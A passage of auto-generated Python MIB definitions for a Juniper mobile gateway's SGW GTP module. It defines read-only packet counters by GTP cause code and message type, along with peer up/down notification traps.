if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsIMSINotKnTx.setDescription('Number of GTP packets sent with cause IMSI Not Known.')
jnxMbgSgwIfGtpV2ICsCondIEMsRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 163), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsCondIEMsRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsCondIEMsRx.setDescription('Number of GTPV2 packets received with cause Conditional IE Missing.')
jnxMbgSgwIfGtpV2ICsCondIEMsTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 164), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsCondIEMsTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsCondIEMsTx.setDescription('Number of GTP packets sent with cause Conditional IE Missing.')
jnxMbgSgwIfGtpV2ICsAPNResTIncRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 165), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsAPNResTIncRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsAPNResTIncRx.setDescription('Number of GTPV2 packets received with cause APN Restriction Type Incompatible.')
jnxMbgSgwIfGtpV2ICsAPNResTIncTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 166), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsAPNResTIncTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsAPNResTIncTx.setDescription('Number of GTP packets sent with cause APN Restriction Type Incompatible.')
jnxMbgSgwIfGtpV2ICsUnknownRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 167), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsUnknownRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsUnknownRx.setDescription('Number of GTPV2 packets received with cause Unknown.')
jnxMbgSgwIfGtpV2ICsUnknownTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 168), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsUnknownTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsUnknownTx.setDescription('Number of GTP packets sent with cause Unknown.')
jnxMbgSgwIfGtpV2ICsLclDetRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 169), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsLclDetRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsLclDetRx.setDescription('Number of GTP packets received with cause Local Detach.')
jnxMbgSgwIfGtpV2ICsLclDetTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 170), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsLclDetTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsLclDetTx.setDescription('Number of GTP packets sent with cause Local Detach.')
jnxMbgSgwIfGtpV2ICsCmpDetRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 171), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsCmpDetRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsCmpDetRx.setDescription('Number of GTP packets received with cause Complete Detach.')
jnxMbgSgwIfGtpV2ICsCmpDetTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 172), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsCmpDetTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsCmpDetTx.setDescription('Number of GTP packets sent with cause Complete Detach.')
jnxMbgSgwIfGtpV2ICsRATChgRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 173), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsRATChgRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsRATChgRx.setDescription('Number of GTP packets received with cause RAT changed from 3GPP to non 3GPP.')
jnxMbgSgwIfGtpV2ICsRATChgTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 174), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsRATChgTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsRATChgTx.setDescription('Number of GTP packets sent with cause RAT changed from 3GPP to non 3GPP.')
jnxMbgSgwIfGtpV2ICsISRDeactRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 175), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsISRDeactRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsISRDeactRx.setDescription('Number of GTP packets received with cause ISR Deactivated.')
jnxMbgSgwIfGtpV2ICsISRDeactTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 176), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsISRDeactTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsISRDeactTx.setDescription('Number of GTP packets sent with cause ISR Deactivated.')
jnxMbgSgwIfGtpV2ICsEIFRNCEnRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 177), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsEIFRNCEnRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsEIFRNCEnRx.setDescription('Number of GTP packets received with cause Error Indication from RNC eNodeB.')
jnxMbgSgwIfGtpV2ICsEIFRNCEnTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 178), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsEIFRNCEnTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsEIFRNCEnTx.setDescription('Number of GTP packets sent with cause Error Indication from RNC eNodeB.')
jnxMbgSgwIfGtpV2ICsSemErTADRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 179), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsSemErTADRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsSemErTADRx.setDescription('Number of GTP packets received with cause Semantic Error in TAD Operation.')
jnxMbgSgwIfGtpV2ICsSemErTADTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 180), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsSemErTADTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsSemErTADTx.setDescription('Number of GTP packets sent with cause Semantic Error in TAD Operation.')
jnxMbgSgwIfGtpV2ICsSynErTADRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 181), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsSynErTADRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsSynErTADRx.setDescription('Number of GTP packets received with cause Syntactic Error in TAD Operation.')
jnxMbgSgwIfGtpV2ICsSynErTADTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 182), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsSynErTADTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsSynErTADTx.setDescription('Number of GTP packets sent with cause Syntactic Error in TAD Operation.')
jnxMbgSgwIfGtpV2ICsRMValRcvRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 183), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsRMValRcvRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsRMValRcvRx.setDescription('Number of GTP packets received with cause Reserved Message Value Received.')
jnxMbgSgwIfGtpV2ICsRMValRcvTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 184), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsRMValRcvTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsRMValRcvTx.setDescription('Number of GTP packets sent with cause Reserved Message Value Received.')
jnxMbgSgwIfGtpV2ICsRPrNtRspRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 185), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsRPrNtRspRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsRPrNtRspRx.setDescription('Number of GTP packets received with cause Remote peer not responding.')
jnxMbgSgwIfGtpV2ICsRPrNtRspTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 186), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsRPrNtRspTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsRPrNtRspTx.setDescription('Number of GTP packets sent with cause Remote peer not responding.')
jnxMbgSgwIfGtpV2ICsColNWReqRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 187), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsColNWReqRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsColNWReqRx.setDescription('Number of GTP packets received with cause Collision with network initiated request.')
jnxMbgSgwIfGtpV2ICsColNWReqTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 188), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsColNWReqTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsColNWReqTx.setDescription('Number of GTP packets sent with cause Collision with network initiated request.')
jnxMbgSgwIfGtpV2ICsUnPgUESusRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 189), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsUnPgUESusRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsUnPgUESusRx.setDescription('Number of GTP packets received with cause Unable to page UE due to suspension.')
jnxMbgSgwIfGtpV2ICsUnPgUESusTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 190), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsUnPgUESusTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsUnPgUESusTx.setDescription('Number of GTP packets sent with cause Unable to page UE due to suspension.')
jnxMbgSgwIfGtpV2ICsInvTotLenRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 191), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsInvTotLenRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsInvTotLenRx.setDescription('Number of GTP packets received with cause Invalid total len.')
jnxMbgSgwIfGtpV2ICsInvTotLenTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 192), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsInvTotLenTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsInvTotLenTx.setDescription('Number of GTP packets sent with cause Invalid total len.')
jnxMbgSgwIfGtpV2ICsDtForNtSupRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 193), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsDtForNtSupRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsDtForNtSupRx.setDescription('Number of GTP packets received with cause Data forwarding not supported.')
jnxMbgSgwIfGtpV2ICsDtForNtSupTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 194), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsDtForNtSupTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsDtForNtSupTx.setDescription('Number of GTP packets sent with cause Data forwarding not supported.')
jnxMbgSgwIfGtpV2ICsInReFRePrRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 195), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsInReFRePrRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsInReFRePrRx.setDescription('Number of GTP packets received with cause Invalid Reply from Remote peer.')
jnxMbgSgwIfGtpV2ICsInReFRePrTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 196), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsInReFRePrTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsInReFRePrTx.setDescription('Number of GTP packets sent with cause Invalid Reply from Remote peer.')
jnxMbgSgwIfGtpV2ICsInvPrRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 197), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsInvPrRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsInvPrRx.setDescription('Number of GTP packets received with cause Invalid peer.')
jnxMbgSgwIfGtpV2ICsInvPrTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 198), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsInvPrTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsInvPrTx.setDescription('Number of GTP packets sent with cause Invalid peer.')
jnxMbgSgwIfGtpV1ProtocolErrRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 199), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV1ProtocolErrRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV1ProtocolErrRx.setDescription('Number of GTPv1 Protocol Errors Received.')
jnxMbgSgwIfGtpV1UnSupMsgRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 200), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV1UnSupMsgRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV1UnSupMsgRx.setDescription('Number of GTPv1 Unsupported Messages received.')
jnxMbgSgwIfGtpV1T3RespTmrExpRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 201), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV1T3RespTmrExpRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV1T3RespTmrExpRx.setDescription('Number of GTP V1 T3 timer expiries Received.')
jnxMbgSgwIfGtpV1EndMarkerRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 202), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV1EndMarkerRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV1EndMarkerRx.setDescription('Number of GTP V1 end marker packets received.')
jnxMbgSgwIfGtpV1EndMarkerTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 203), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV1EndMarkerTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV1EndMarkerTx.setDescription('Number of GTP V1 end marker packets sent.')
jnxMbgSgwIfGtpV1EchoReqRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 204), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV1EchoReqRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV1EchoReqRx.setDescription('Number of GTP V1 echo request packets received.')
jnxMbgSgwIfGtpV1EchoReqTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 205), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV1EchoReqTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV1EchoReqTx.setDescription('Number of GTP V1 echo request packets sent.')
jnxMbgSgwIfGtpV1EchoRespRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 206), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV1EchoRespRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV1EchoRespRx.setDescription('Number of GTP V1 echo response packets received.')
jnxMbgSgwIfGtpV1EchoRespTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 207), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV1EchoRespTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV1EchoRespTx.setDescription('Number of GTP V1 echo response packets sent.')
jnxMbgSgwIfGtpV1ErrIndRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 208), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV1ErrIndRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV1ErrIndRx.setDescription('Number of GTP packets V1 Error Indication packets received.')
jnxMbgSgwIfGtpV1ErrIndTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 209), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV1ErrIndTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV1ErrIndTx.setDescription('Number of GTP packets V1 Error Indication packets sent.')
jnxMbgSgwIfSuspNotifRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 210), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfSuspNotifRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfSuspNotifRx.setDescription('Number of GTPv2 Suspend Notification messages received.')
jnxMbgSgwIfSuspNotifTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 211), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfSuspNotifTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfSuspNotifTx.setDescription('Number of GTPv2 Suspend Notification messages sent.')
jnxMbgSgwIfSuspAckRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 212), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfSuspAckRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfSuspAckRx.setDescription('Number of GTPv2 Suspend Acknowledgement messages received.')
jnxMbgSgwIfSuspAckTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 213), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfSuspAckTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfSuspAckTx.setDescription('Number of GTPv2 Suspend Acknowledgement messages sent.')
jnxMbgSgwIfResumeNotifRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 214), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfResumeNotifRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfResumeNotifRx.setDescription('Number of GTPv2 Resume Notification messages received.')
jnxMbgSgwIfResumeNotifTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 215), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfResumeNotifTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfResumeNotifTx.setDescription('Number of GTPv2 Resume Notification messages sent.')
jnxMbgSgwIfResumeAckRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 216), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfResumeAckRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfResumeAckRx.setDescription('Number of GTPv2 Resume Acknowledgement messages received.')
jnxMbgSgwIfResumeAckTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 217), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfResumeAckTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfResumeAckTx.setDescription('Number of GTPv2 Resume Acknowledgement messages sent.')
jnxMbgSgwIfPiggybackMsgRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 218), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfPiggybackMsgRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfPiggybackMsgRx.setDescription('Number of GTPv2 Piggyback messages received.')
jnxMbgSgwIfPiggybackMsgTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 219), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfPiggybackMsgTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfPiggybackMsgTx.setDescription('Number of GTPv2 S11 Piggyback messages sent.')
jnxMbgSgwGtpNotificationVars = MibIdentifier((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 3))
jnxMbgSgwGtpPeerName = MibScalar((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 3, 1), DisplayString()).setMaxAccess("accessiblefornotify")
if mibBuilder.loadTexts: jnxMbgSgwGtpPeerName.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpPeerName.setDescription('GTP Peer Name/IP')
jnxMbgSgwGtpAlarmStatCounter = MibScalar((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 3, 2), Unsigned32()).setMaxAccess("accessiblefornotify")
if mibBuilder.loadTexts: jnxMbgSgwGtpAlarmStatCounter.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpAlarmStatCounter.setDescription('Current Value of (Alarm) Statistics Counter eg: in jnxMbgSgwGtpPrDNTPerPrAlrmActv it spefies the number of times peer is down with in the monitoring interval')
jnxMbgSgwGtpInterfaceType = MibScalar((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 3, 3), DisplayString()).setMaxAccess("accessiblefornotify")
if mibBuilder.loadTexts: jnxMbgSgwGtpInterfaceType.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpInterfaceType.setDescription('GTP Interface Type which can be one of S5/S8/S11/S1U/S12/S4')
jnxMbgSgwGtpGwName = MibScalar((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 3, 4), DisplayString()).setMaxAccess("accessiblefornotify")
if mibBuilder.loadTexts: jnxMbgSgwGtpGwName.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpGwName.setDescription('A string that indicates the gateway name')
jnxMbgSgwGtpGwIndex = MibScalar((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 3, 5), Unsigned32()).setMaxAccess("accessiblefornotify")
if mibBuilder.loadTexts: jnxMbgSgwGtpGwIndex.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpGwIndex.setDescription('Current Gateway ID value')
jnxMbgSgwGtpPeerGwUpNotif = NotificationType((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 0, 1)).setObjects(("JUNIPER-MOBILE-GATEWAY-SGW-GTP-MIB", "jnxMbgSgwGtpGwIndex"), ("JUNIPER-MOBILE-GATEWAY-SGW-GTP-MIB", "jnxMbgSgwGtpGwName"), ("JUNIPER-MOBILE-GATEWAY-SGW-GTP-MIB", "jnxMbgSgwGtpInterfaceType"), ("JUNIPER-MOBILE-GATEWAY-SGW-GTP-MIB", "jnxMbgSgwGtpPeerName"))
if mibBuilder.loadTexts: jnxMbgSgwGtpPeerGwUpNotif.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpPeerGwUpNotif.setDescription('GTPC Peer UP Notification. This trap is sent when a new peer is added or an existing peer goes down and comes back up.')
jnxMbgSgwGtpPeerGwDnNotif = NotificationType((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 0, 2)).setObjects(("JUNIPER-MOBILE-GATEWAY-SGW-GTP-MIB", "jnxMbgSgwGtpGwIndex"), ("JUNIPER-MOBILE-GATEWAY-SGW-GTP-MIB", "jnxMbgSgwGtpGwName"), ("JUNIPER-MOBILE-GATEWAY-SGW-GTP-MIB", "jnxMbgSgwGtpInterfaceType"), ("JUNIPER-MOBILE-GATEWAY-SGW-GTP-MIB", "jnxMbgSgwGtpPeerName"))
if mibBuilder.loadTexts: jnxMbgSgwGtpPeerGwDnNotif.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpPeerGwDnNotif.setDescription('GTPC Peer Down Notification. This trap is sent when a peer connection goes down.')
jnxMbgSgwGtpPrDnTPerPrAlrmActv = NotificationType((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 0, 3)).setObjects(("JUNIPER-MOBILE-GATEWAY-SGW-GTP-MIB", "jnxMbgSgwGtpGwIndex"), ("JUNIPER-MOBILE-GATEWAY-SGW-GTP-MIB", "jnxMbgSgwGtpGwName"), ("JUNIPER-MOBILE-GATEWAY-SGW-GTP-MIB", "jnxMbgSgwGtpInterfaceType"), ("JUNIPER-MOBILE-GATEWAY-SGW-GTP-MIB", "jnxMbgSgwGtpPeerName"), ("JUNIPER-MOBILE-GATEWAY-SGW-GTP-MIB", "jnxMbgSgwGtpAlarmStatCounter"))
if mibBuilder.loadTexts: jnxMbgSgwGtpPrDnTPerPrAlrmActv.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpPrDnTPerPrAlrmActv.setDescription('Peer down Threshold trap Active. This is sent when a peer connection flaps for more than a higher threshold number of times with in a monitor interval.')
